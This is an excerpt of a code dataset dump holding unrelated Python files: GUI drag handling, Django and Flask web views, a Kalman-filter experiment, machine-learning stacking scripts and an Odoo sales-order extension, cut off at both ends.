gaphas.view import GtkView\n\nlog = logging.getLogger(__name__)\n\n\nclass MoveType(Protocol):\n def __init__(self, item: Item, view: GtkView):\n ...\n\n def start_move(self, pos: Pos) -> None:\n ...\n\n def move(self, pos: Pos) -> None:\n ...\n\n def stop_move(self, pos: Pos) -> None:\n ...\n\n\ndef item_tool(view: GtkView) -> Gtk.GestureDrag:\n \"\"\"Handle item movement and movement of handles.\"\"\"\n gesture = Gtk.GestureDrag.new(view)\n drag_state = DragState()\n gesture.connect(\"drag-begin\", on_drag_begin, drag_state)\n gesture.connect(\"drag-update\", on_drag_update, drag_state)\n gesture.connect(\"drag-end\", on_drag_end, drag_state)\n return gesture\n\n\nclass DragState:\n def __init__(self):\n self.moving = set()\n\n\ndef on_drag_begin(gesture, start_x, start_y, drag_state):\n view = gesture.get_widget()\n selection = view.selection\n event = gesture.get_last_event(None)\n modifiers = event.get_state()[1]\n item, handle = find_item_and_handle_at_point(view, (start_x, start_y))\n\n # Deselect all items unless CTRL or SHIFT is pressed\n # or the item is already selected.\n if not (\n modifiers & (Gdk.ModifierType.CONTROL_MASK | Gdk.ModifierType.SHIFT_MASK)\n or item in selection.selected_items\n ):\n selection.unselect_all()\n\n if not item:\n gesture.set_state(Gtk.EventSequenceState.DENIED)\n return\n\n if (\n not handle\n and item in selection.selected_items\n and modifiers & Gdk.ModifierType.CONTROL_MASK\n ):\n selection.unselect_item(item)\n gesture.set_state(Gtk.EventSequenceState.DENIED)\n return\n\n selection.focused_item = item\n gesture.set_state(Gtk.EventSequenceState.CLAIMED)\n\n if handle:\n drag_state.moving = {HandleMove(item, handle, view)}\n else:\n drag_state.moving = set(moving_items(view))\n\n for moving in drag_state.moving:\n moving.start_move((start_x, start_y))\n\n\ndef find_item_and_handle_at_point(\n view: GtkView, pos: Pos\n) -> Tuple[Optional[Item], Optional[Handle]]:\n item, handle = handle_at_point(view, pos)\n return item or item_at_point(view, pos), handle\n\n\ndef moving_items(view):\n \"\"\"Filter the items that should eventually be moved.\n\n Returns Move aspects for the items.\n \"\"\"\n selected_items = set(view.selection.selected_items)\n for item in selected_items:\n # Do not move subitems of selected items\n if not set(ancestors(view.model, item)).intersection(selected_items):\n yield Move(item, view)\n\n\ndef on_drag_update(gesture, offset_x, offset_y, drag_state):\n _, x, y = gesture.get_start_point()\n for moving in drag_state.moving:\n moving.move((x + offset_x, y + offset_y))\n\n\ndef on_drag_end(gesture, offset_x, offset_y, drag_state):\n _, x, y = gesture.get_start_point()\n for moving in drag_state.moving:\n moving.stop_move((x + offset_x, y + offset_y))\n drag_state.moving = set()\n\n\ndef handle_at_point(\n view: GtkView, pos: Pos, distance: int = 6\n) -> Union[Tuple[Item, Handle], Tuple[None, None]]:\n \"\"\"Look for a handle at ``pos`` and return the tuple (item, handle).\"\"\"\n\n def find(item):\n \"\"\"Find item's handle at pos.\"\"\"\n v2i = view.get_matrix_v2i(item)\n d = distance_point_point_fast(v2i.transform_distance(0, distance))\n x, y = v2i.transform_point(*pos)\n\n for h in item.handles():\n if not h.movable:\n continue\n hx, hy = h.pos\n if -d < (hx - x) < d and -d < (hy - y) < d:\n return h\n\n selection = view.selection\n\n # The focused item is the preferred item for handle grabbing\n if selection.focused_item:\n h = find(selection.focused_item)\n if h:\n return selection.focused_item, h\n\n # then try hovered 
item\n if selection.hovered_item:\n h = find(selection.hovered_item)\n if h:\n return selection.hovered_item, h\n\n # Last try all items, checking the bounding box first\n x, y = pos\n items = reversed(\n list(\n view.get_items_in_rectangle(\n (x - distance, y - distance, distance * 2, distance * 2)\n )\n )\n )\n\n for item in items:\n h = find(item)\n if h:\n return item, h\n return None, None\n","sub_path":"gaphas/tool/itemtool.py","file_name":"itemtool.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"311820999","text":"# -*- coding: utf-8 -*-\nfrom admintool.nc.models import Tree_bulk_edit, Type, ATTR\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom generic import GenericRequired\nfrom django.conf import settings\n\n\nclass BulkRequired(GenericRequired):\n\n def node(self):\n success = False\n \n if self.params().has_key('attr_schema'):\n schema = self.params()['attr_schema']\n \n if 'node' in getattr(self.request, self._method):\n node = getattr(self.request, self._method)['node']\n \n if \"/%s\" % node == settings.OT_ROOT or node == settings.OT_ROOT:\n try:\n Tree_bulk_edit.objects.filter(parent=None, attr_schema=schema)\n except ObjectDoesNotExist:\n self._reasons.append(u\"Ошибка в таблице Tree_bulk_edit => нет OT с parent=None\")\n else:\n success = True \n self._params['node'] = None\n return True\n else:\n try:\n node = int(node)\n except ValueError:\n #значение пришло не число - выкинем ошибку\n self._reasons.append(u\"Узел дерева[Bulk Edit] не число: %s\" % node)\n else: \n try:\n node = Tree_bulk_edit.objects.get(id=node)\n except ObjectDoesNotExist:\n self._reasons.append(u\"Узел дерева[Bulk Edit] не найден по ID: %s\" % node)\n else:\n success = True\n self._params['node'] = node\n return True \n else:\n self._reasons.append(u\"ID узла дерева[Bulk Edit] обязательным параметром\")\n \n def attrs(self):\n success = False\n self._params['attrs'] = []\n\n if 'attrs' in getattr(self.request, self._method):\n attrs = getattr(self.request, self._method).getlist('attrs')\n \n for attr in attrs:\n try:\n attr = int(attr)\n except ValueError:\n #значение пришло не число - выкинем ошибку\n self._reasons.append(u\"ID атрибута не число: %s\" % attr)\n else: \n try:\n attr = Tree_bulk_edit.objects.get(id=attr, type='attr')\n except ObjectDoesNotExist:\n self._reasons.append(u\"Bulk Edit атрибут не найден в таблице Tree_bulk_edit по ID: %s\" % attr)\n else:\n try:\n attr = ATTR.objects.get(id=attr.orig_id)\n except ObjectDoesNotExist:\n self._reasons.append(u\"Атрибут не найден по bulk_edit ORIG_ID: %s\" % attr.orig_id)\n else:\n success = True\n self._params['attrs'].append(attr)\n else:\n self._reasons.append(u\"Список ID атрибутов является обязательным параметром\")\n \n return success\n \n def name(self):\n success = True\n \n if 'name' in getattr(self.request, self._method):\n name = getattr(self.request, self._method)['name']\n \n if name.lstrip().rstrip() == '':\n success = False\n self._reasons.append(u\"Имя не должно быть пустым\")\n else:\n self._params['name'] = name\n else:\n self._params['name'] = None\n \n return success\n\n def description(self):\n success = True\n \n if 'description' in getattr(self.request, self._method):\n description = getattr(self.request, self._method)['description']\n \n self._params['description'] = description\n else:\n self._params['description'] = None\n \n return success\n\n def type(self):\n success = True\n \n if 'type' in 
getattr(self.request, self._method):\n type = getattr(self.request, self._method)['type']\n\n try:\n type = int(type)\n except ValueError:\n #значение пришло не число - выкинем ошибку\n success = False\n self._reasons.append(u\"тип атрибута не число: %s\" % type)\n else: \n try:\n type = Type.objects.get(id=type)\n except ObjectDoesNotExist:\n success = False\n self._reasons.append(u\"Атрибутный тип не найден по ID: %s\" % type)\n else:\n self._params['type'] = type\n else:\n self._params['type'] = None\n \n return success\n\n def def_value(self):\n success = True\n \n if 'def_value' in getattr(self.request, self._method):\n def_value = getattr(self.request, self._method)['def_value']\n \n self._params['def_value'] = def_value\n else:\n self._params['def_value'] = None\n\n return success\n \n def mask(self):\n success = True\n \n if 'mask' in getattr(self.request, self._method):\n mask = getattr(self.request, self._method)['mask']\n \n self._params['mask'] = mask\n else:\n self._params['mask'] = None\n\n return success\n \n def displayed(self):\n success = True\n \n if 'displayed' in getattr(self.request, self._method):\n displayed = getattr(self.request, self._method)['displayed']\n \n if displayed.upper() in ('TRUE', 'FALSE'):\n if displayed.upper() == 'FALSE':\n self._params['displayed'] = False\n \n if displayed.upper() == 'TRUE':\n self._params['displayed'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Displayed = 'True' or 'False'. Пришло: %s\" % displayed)\n else:\n self._params['displayed'] = None\n\n return success\n\n def multiple(self):\n success = True\n \n if 'multiple' in getattr(self.request, self._method):\n multiple = getattr(self.request, self._method)['multiple']\n \n if multiple.upper() in ('TRUE', 'FALSE'):\n if multiple.upper() == 'FALSE':\n self._params['multiple'] = False\n \n if multiple.upper() == 'TRUE':\n self._params['multiple'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Multiple = 'True' or 'False'. Пришло: %s\" % multiple)\n else:\n self._params['multiple'] = None\n\n return success\n \n def read_only(self):\n success = True\n \n if 'read_only' in getattr(self.request, self._method):\n read_only = getattr(self.request, self._method)['read_only']\n \n if read_only.upper() in ('TRUE', 'FALSE'):\n if read_only.upper() == 'FALSE':\n self._params['read_only'] = False\n \n if read_only.upper() == 'TRUE':\n self._params['read_only'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Read Only = 'True' or 'False'. Пришло: %s\" % read_only)\n else:\n self._params['read_only'] = None \n\n return success\n \n def hidden(self):\n success = True\n \n if 'hidden' in getattr(self.request, self._method):\n hidden = getattr(self.request, self._method)['hidden']\n \n if hidden.upper() in ('TRUE', 'FALSE'):\n if hidden.upper() == 'FALSE':\n self._params['hidden'] = False\n \n if hidden.upper() == 'TRUE':\n self._params['hidden'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Hidden = 'True' or 'False'. 
Пришло: %s\" % hidden)\n else:\n self._params['hidden'] = None \n\n return success\n \n def required(self):\n success = True\n \n if 'required' in getattr(self.request, self._method):\n required = getattr(self.request, self._method)['required']\n \n if required.upper() in ('TRUE', 'FALSE'):\n if required.upper() == 'FALSE':\n self._params['required'] = False\n \n if required.upper() == 'TRUE':\n self._params['required'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Required = 'True' or 'False'. Пришло: %s\" % required)\n else:\n self._params['required'] = None \n\n return success\n \n def calculable(self):\n success = True\n \n if 'calculable' in getattr(self.request, self._method):\n calculable = getattr(self.request, self._method)['calculable']\n \n if calculable.upper() in ('TRUE', 'FALSE'):\n if calculable.upper() == 'FALSE':\n self._params['calculable'] = False\n \n if calculable.upper() == 'TRUE':\n self._params['calculable'] = True\n else:\n success = False\n self._reasons.append(u\"Ожидаемое значение для Calculable = 'True' or 'False'. Пришло: %s\" % calculable)\n else:\n self._params['calculable'] = None\n \n return success ","sub_path":"nc/lib/required/bulk.py","file_name":"bulk.py","file_ext":"py","file_size_in_byte":10627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"277694396","text":"from django.shortcuts import render, redirect\n\nfrom .models import Route\n\n\n\"\"\" def createSchedule(request):\n schedule_form = ScheduleForm() \"\"\"\n'''\ndef create_class_model_form(request):\n template_name = 'cav_map/coordinateInputs.html'\n #heading_message = 'Model Formset Demo'\n if request.method == 'GET':\n # we don't want to display the already saved model instances\n formset = ClassFormset(queryset=Class.objects.none())\n elif request.method == 'POST':\n formset = ClassFormset(request.POST)\n if formset.is_valid():\n for form in formset:\n # only save if name is present\n if form.cleaned_data.get('className'):\n form.save()\n return redirect('1/multiPath')\n return render(request, template_name, {\n 'formset': formset,\n })\n'''\n\n'''def classInfo(request):\n i = 0\n #if request.method == 'POST':\n class_form = ClassForm(request.POST)\n classes_form = [6]\n \n if class_form.is_valid():\n \n new_class = class_form.save()\n print(class_form)\n print(new_class.className, new_class.building)\n #classes_form[i] = new_class\n i + 1\n\n #new_class.student = request.user #set student to user logged in\n #new_class.save()\n #class_form.save()\n return redirect('1/multiPath')\n #else:\n # class_form = ClassForm()\n \n context = {\n \n }\n return render(request, 'cav_map/coordinateInputs.html', {'form' : class_form})\n\n#def scheduleInfo(request):\n\n #schedule_form = \n'''\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom django.views import generic\nfrom .models import ForumPost, ForumPostForm\nfrom django.http import HttpResponseRedirect\nimport datetime\nfrom pytz import timezone\nimport json\n\n\ndef forum_post_create_view(request):\n if request.method == 'POST':\n form = ForumPostForm(request.POST)\n if form.is_valid():\n f = ForumPost()\n f.title_field = form.cleaned_data['title_field']\n f.author = request.user\n f.pub_date = datetime.datetime.utcnow()-datetime.timedelta(hours=4)\n f.post = form.cleaned_data['post']\n f.save()\n return HttpResponseRedirect('/forum/')\n else:\n form = ForumPostForm()\n context = 
{'form': form}\n return render(request, \"cav_map/createPost.html\", context)\n\ndef create_class(request):\n template = 'cav_map/multiPath.html'\n if request.method == 'POST':\n request_getdata = request.POST.get(\"urls\", \"None\")\n lst = json.loads(request_getdata)\n entry = Route.objects.filter(user=request.user).first()\n if entry:\n r = Route.objects.get(user=request.user)\n else:\n r = Route()\n r.user = request.user\n r.urls = lst\n #new_class = Class.objects.get()\n r.save()\n return render(request, template)\ndef create_class2(request):\n entry = Route.objects.filter(user=request.user).first()\n if entry:\n context = {'urls': json.dumps(Route.objects.get(user=request.user).urls)}\n else:\n url = '/routemaker/'\n resp_body = '' % url\n return HttpResponse(resp_body)\n template = 'cav_map/savedMP.html'\n return render(request, template, context)\nclass forumPostView(generic.ListView):\n context_object_name = 'ps'\n template_name = 'cav_map/forum.html'\n def get_queryset(self):\n return ForumPost.objects.all().order_by('-pub_date')\n","sub_path":"cav_map/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"251891768","text":"from flask import Flask, request, render_template, redirect\n\nimport hackbright\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef directory_homepage():\n \"\"\"Show directory of all students and all projects\"\"\"\n\n student_list = hackbright.get_student_body()\n project_list = hackbright.get_all_projects()\n\n return render_template(\"homepage.html\",\n students=student_list,\n projects=project_list)\n\n@app.route(\"/student\")\ndef get_student():\n \"\"\"Show information about a student.\"\"\"\n\n github = request.args.get('github','jhacks')\n first, last, github = hackbright.get_student_by_github(github)\n project_information = hackbright.get_grades_by_github(github)\n # return \"%s is the GitHub account for %s %s\" % (github, first, last)\n return render_template(\"student_info.html\",\n github=github, \n first=first, \n last=last,\n project_information=project_information)\n\n@app.route(\"/student-search\")\ndef get_student_form():\n \"\"\"Show form for searching for a student\"\"\"\n\n return render_template(\"student_search.html\")\n\n\n@app.route(\"/student-add\")\ndef student_add():\n \"\"\"Add a student.\"\"\"\n\n return render_template(\"new_student.html\")\n\n\n@app.route(\"/add-to-database\", methods=['POST'])\ndef add_database():\n \"\"\"Add a student.\"\"\"\n\n github_input = request.form.get('github')\n first_name = request.form.get('first_name')\n last_name = request.form.get('last_name')\n\n hackbright.make_new_student(first_name,last_name,github_input)\n\n return redirect(\"/student-search\")\n\n\n\n@app.route(\"/project\")\ndef describe_project():\n \"\"\"Gives title, description, and maximum grade of a project\"\"\"\n\n title = request.args.get('name')\n project_info = hackbright.get_project_by_title(title)\n project_title, description, max_grade = project_info\n\n project_grades = hackbright.get_grades_by_title(title)\n \n\n\n return render_template(\"/projects.html\", \n project_title=project_title, \n description=description,\n max_grade=max_grade,\n grades=project_grades)\n\n\nif __name__ == \"__main__\":\n hackbright.connect_to_db(app)\n 
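# --- Illustrative sketch (not from the original record): exercising the Flask
# routes above with the built-in test client. Assumes a local test database and
# a student with the default 'jhacks' GitHub handle.
def smoke_test():
    hackbright.connect_to_db(app)
    with app.test_client() as client:
        assert client.get("/student?github=jhacks").status_code == 200
        resp = client.post("/add-to-database", data={
            "github": "newbie", "first_name": "New", "last_name": "Student"})
        assert resp.status_code == 302  # redirect back to /student-search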
app.run(debug=True)\n","sub_path":"hackbright-web.py","file_name":"hackbright-web.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"505506978","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 21:15:17 2016\n\n@author: seis\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom function import Lorenz96, RungeKutta4, KF\nimport sys\n\n#各定数の定義を行う\nT = 0\ndt = 0.05\nF = 8.\nJ = 40\n\nR = np.eye(J)\nP_a = R*10\nP_a = R\nH = np.eye(J)\n\n#データの読み込みを行っている。data[i]がiステップ目の40個のベクトルデータになっている。data1が真値data2が観測値\ndata1 = np.loadtxt(\"data01.txt\", delimiter=\", \")\ndata2 = np.loadtxt(\"data02.txt\", delimiter=\", \")\n\n#カルマンフィルターを適用した場合\nFig1 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nx_a = data2[0]\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a, P_a = KF(x_a, x_f, y, dt, P_a, H, R)\n Fig1.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\n#sys.exit()\n\n#最初に観測値だけを代入してその後は観測値を全く使わずに計算した場合\nFig2 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a = x_f.copy()\n Fig2.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J)) \n\n#毎回観測値を代入して計算した場合\nFig3 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\ny = data2[0]\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, y, F, dt)\n y = data2[i]\n x_a = x_f.copy()\n Fig3.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\n\n#毎回観測値と予測値を1/2ずつ足しあわせたものを解析値とした場合\nFig4 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a = (x_f + y)/2\n Fig4.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\n \n#その他の場合\nFig5 = []\nx_a = data2[0]\nx_a = np.random.normal(0, 10., J)\nfor i in range(1, len(data2)):\n x_t = data1[i]\n x_f = RungeKutta4(Lorenz96, x_a, F, dt)\n y = data2[i]\n x_a = (x_f*5 + y)/6\n Fig5.append(np.linalg.norm(x_t- x_a)/ np.sqrt(J))\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig1)\n#plt.title(\"case 3\")\n#plt.savefig(\"Fig4.png\",format = 'png', dpi=300)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig2)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig3)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig4)\nplt.show()\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\nplt.plot(Fig5)\nplt.show()\n\nplt.plot(Fig1, label=\"x_a = KF(x_f, y)\")\nplt.plot(Fig2, label=\"x_a = x_f\")\nplt.plot(Fig3, label=\"x_a = y\")\nplt.plot(Fig4, label=\"x_a = (x_f + y)/2\")\nplt.xlim(0, 1460)\nplt.ylim(0, 7)\nplt.xlabel(\"TimeSteps\")\nplt.ylabel(\"Error\")\n#plt.legend(loc=2)\n#plt.legend(bbox_to_anchor=(1.05, 1), loc=2)#, borderaxespad=0.)\n#plt.savefig(\"Fig4.png\",format = 'png', dpi=300)\nplt.show()\n\n\n#誤差のノルムを計算\nFig1 = np.array(Fig1)\nFig2 = np.array(Fig2)\nFig3 = np.array(Fig3)\nFig4 = np.array(Fig4)\nFig5 = np.array(Fig5)\nprint(Fig1.mean(), Fig2.mean(), Fig3.mean(), Fig4.mean(), Fig5.mean())\nprint(Fig1.std(), Fig2.std(), Fig3.std(), Fig4.std(), 
Fig5.std())\n","sub_path":"aineko27_nakamura_20160524/problem5_1.py","file_name":"problem5_1.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"378637817","text":"# 2.信号与槽\n''' qt中没中组件都有所谓的信号槽(slot)机制。可以用来将信号与相应的处理函数进行连接绑定 '''\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nimport sys\nclass MainWidnow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.windowTitleChanged.connect(self._my_func)\n\n # 设置窗口标题\n self.setWindowTitle('My First App')\n\n # 设置标签\n label = QLabel('Welcome to shiyanlou!')\n # 设置标签显示在中央\n label.setAlignment(Qt.AlignCenter)\n self.setCentralWidget(label)\n\n def _my_func(self, s='my_func', a=100):\n dic = {'s': s, 'a': a}\n print(dic)\n\napp = QApplication(sys.argv)\nwindow = MainWidnow()\n\nwindow.show()\napp.exec_()","sub_path":"pyqt/study/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"13387750","text":"import discord\n\n\nbuttons = [\"🔎\", \"🎲\", \"💰\", \"🎶\", \"⚙\", \"🗑\"]\n\npage1 = discord.Embed(title=\"🔎\", description=\"Help:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\npage2 = discord.Embed(title=\"🎲\", description=\"Fun:\\n\"\n \"**Hier wird grade Gearbeitet **\\n\"\n \"**Hier wird grade Gearbeitet **\\n\", colour=discord.Colour(0xb8e986))\n\npage3 = discord.Embed(title=\"💰\", description=\"General:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\npage4 = discord.Embed(title=\"🎶\", description=\"Musikbot:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\npage5 = discord.Embed(title=\"⚙\", description=\"Admin Tools:\\n\"\n \"**Hier wird grade Gearbeitet **\", colour=discord.Colour(0xb8e986))\n\n\nhelp_pages = [page1, page2, page3, page4, page5]\n\n\n\n","sub_path":"const/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"303725058","text":"\nimport pandas as pd\nimport numpy as np\nimport joblib\nfrom pathlib import Path\nfrom sklearn.model_selection import StratifiedKFold\nfrom xgboost.sklearn import XGBClassifier as XGBoost\n\nimport os\nimport sys\n\nsys.path.append('../')\n\n\nRandon_seed = 10\nnjobs = 8\nPath('./Models/TrainADP/').mkdir(exist_ok = True,parents = True)\n\ndef base_clf(clf,X_train,y_train,model_name,n_folds=5):\n ntrain = X_train.shape[0]\n nclass = len(np.unique(y_train))\n kf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=Randon_seed)\n base_train = np.zeros((ntrain,nclass))\n for train_index, test_index in kf.split(X_train,y_train):\n kf_X_train,kf_y_train = X_train[train_index],y_train[train_index]\n kf_X_test = X_train[test_index]\n clf.fit(kf_X_train, kf_y_train)\n base_train[test_index] = clf.predict_proba(kf_X_test)\n clf.fit(X_train,y_train)\n joblib.dump(clf,f'./Models/TrainADP/{model_name}.model')\n return base_train[:,-1]\n\n\n\n\n\ndef StackADPfeature(file):\n final_Features = []\n feature_Name = ['AAC', 'BPNC', 'CTD', 'DPC']\n y = file[0]\n y = np.array([1 if i < 248 else 0 for i in range(407)])\n for j in range(1, len(file)):\n X = file[j]\n final_Features.append(base_clf(XGBoost(), X, np.array(y), feature_Name[j - 1]))\n Features = pd.DataFrame(np.array(final_Features).T, 
columns=feature_Name)\n y = pd.DataFrame(y,columns=['class'])\n TRFeatures = pd.concat([y,Features],axis=1,join='inner')\n file_path = ('ADPT12/Train/ADPT12Stack.csv')\n TRFeatures.to_csv(file_path,index=False)\n return file_path\n\n\n","sub_path":"ADPT12/StackADP.py","file_name":"StackADP.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39058344","text":"# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\n\r\n\r\ndef predict(a,b,c,d,e,f,g,h,i,j,k,l):\r\n\r\n\ty_predAll = []\r\n\r\n\tfor col in range(14,19):\r\n\r\n\r\n\t\t# Importing the dataset\r\n\t\tdataset = pandas.read_excel('data.xlsx')\r\n\t\tX = dataset.iloc[0:35, 1:13].values\r\n\t\ty = dataset.iloc[0:35, col-1:col].values\r\n\r\n\r\n\t\t\r\n\r\n\t\t#topred = [308,0.00124153,992,53.1,0.1154,0.00125,0.6651088,107,0.000001417,50.47,90366,9.2]\r\n\t\ttopred = [a,b,c,d,e,f,g,h,i,j,k,l]\r\n\t\ttopred2 = np.array(topred).reshape(1, -1)\r\n\t\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\tX_train,X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=34)\r\n\r\n\t\t# print(X_test[0])\r\n\r\n\t\t# Fitting Random Forest Regression to the dataset\r\n\r\n\t\tregressor = RandomForestRegressor(n_estimators = 10, random_state = 42)\r\n\t\tregressor.fit(X_train, y_train.ravel())\r\n\r\n\t\t# Predicting a new result\r\n\t\ty_pred = regressor.predict(topred2)\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\tfor x in np.nditer(y_pred):\r\n \t\t\ty_predAll.append(str(x))\r\n \t\t\t\r\n\r\n\t\r\n\treturn y_predAll\r\n\r\n\r\n\t\t# Calculation of Mean Squared Error (MSE)\r\n\t\t#print(r2_score(y_test,y_pred))\r\n\r\n\r\npredict(308,0.00124153,992,53.1,0.1154,0.00125,0.6651088,107,0.000001417,50.47,90366,9.2)\r\n","sub_path":"templates/UserViews/RT.py","file_name":"RT.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"169749516","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import models, fields, api, _\r\nimport odoo.addons.decimal_precision as dp\r\nfrom openerp.exceptions import UserError, RedirectWarning, ValidationError\r\n\r\n\r\nclass SaleOrderLine(models.Model):\r\n _inherit = 'sale.order.line'\r\n\r\n dnk_minimum_quantity = fields.Text('-Minimum Qty.', store=True)\r\n dnk_volume_prices = fields.Text('-Volume Prices', store=True)\r\n\r\n\r\n @api.model\r\n def write(self, vals):\r\n dnk_minimum_quantity, dnk_volume_prices = self._get_volume_prices_per_sale_line(self.order_id, self.product_id, self.product_uom, self.product_uom_qty, self.price_unit)\r\n vals_append = {\r\n 'dnk_minimum_quantity': dnk_minimum_quantity,\r\n 'dnk_volume_prices': dnk_volume_prices,\r\n }\r\n vals.update(vals_append)\r\n return super(SaleOrderLine, self).write(vals)\r\n\r\n\r\n @api.model\r\n def create(self, vals):\r\n sale_order = self.env['sale.order'].browse(vals.get('order_id'))\r\n product = self.env['product.product'].browse(vals.get('product_id'))\r\n product_uom = self.env['product.uom'].browse(vals.get('product_uom'))\r\n product_uom_qty = vals.get('product_uom_qty')\r\n price_unit = vals.get('price_unit')\r\n\r\n dnk_minimum_quantity, dnk_volume_prices = self._get_volume_prices_per_sale_line(sale_order, product, product_uom, product_uom_qty, price_unit)\r\n\r\n vals_append = {\r\n 'dnk_minimum_quantity': dnk_minimum_quantity,\r\n 'dnk_volume_prices': dnk_volume_prices,\r\n }\r\n 
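# --- Illustrative sketch (not from the original record): the same out-of-fold
# idea as base_clf() above, using only scikit-learn. The toy dataset and the
# logistic-regression meta-learner are assumptions for illustration.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_predict

X, y = make_classification(n_samples=200, n_features=10, random_state=10)
# Out-of-fold P(class=1): each row is predicted by a model that never saw it,
# which is what keeps the stacked meta-features leak-free.
oof = cross_val_predict(LogisticRegression(max_iter=1000), X, y,
                        cv=5, method="predict_proba")[:, 1]
meta = LogisticRegression().fit(oof.reshape(-1, 1), y)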
vals.update(vals_append)\n\n return super(SaleOrderLine, self).create(vals)\n\n\n def _formatLang(self, value, show_currency=True):\n lang = self.order_id.partner_id.lang\n lang_objs = self.env['res.lang'].search([('code', '=', lang)])\n if not lang_objs:\n lang_objs = self.env['res.lang'].search([], limit=1)\n lang_obj = lang_objs[0]\n\n decimals_quantity = self.env['decimal.precision'].search([('name', '=', 'Product Price')])\n if decimals_quantity:\n decimals_quantity = decimals_quantity[0].digits\n else:\n decimals_quantity = 2\n\n res = lang_obj.format('%.' + str(decimals_quantity) + 'f', value, grouping=True, monetary=True)\n currency_obj = self.order_id.currency_id\n\n if show_currency and currency_obj and currency_obj.symbol:\n if currency_obj.position == 'after':\n res = '%s%s' % (res, currency_obj.symbol)\n elif currency_obj and currency_obj.position == 'before':\n res = '%s%s' % (currency_obj.symbol, res)\n return res\n\n\n def GetExtraPriceVariantProduct(self, product_id, currency_id):\n # Buscar si el producto tiene \"atributos\": attribute_value_ids != False\n extra_price = 0.00\n if product_id.attribute_value_ids != False:\n for attribute_value in product_id.attribute_value_ids:\n if attribute_value.attribute_id.name=='EST-TALLA ROPA':\n if attribute_value.name in ('2XL', '3XL', '4XL', '5XL'):\n extra_price = 2.00\n if attribute_value.name in ('6XL', '7XL'):\n extra_price = 4.00\n\n # Si la Lista de Precios no es en USD, convertir extra_price a la moneda de la lilsta de precios\n if currency_id.name != \"USD\":\n ResCurrencyRate = self.env['res.currency.rate']\n tipo_de_cambio = 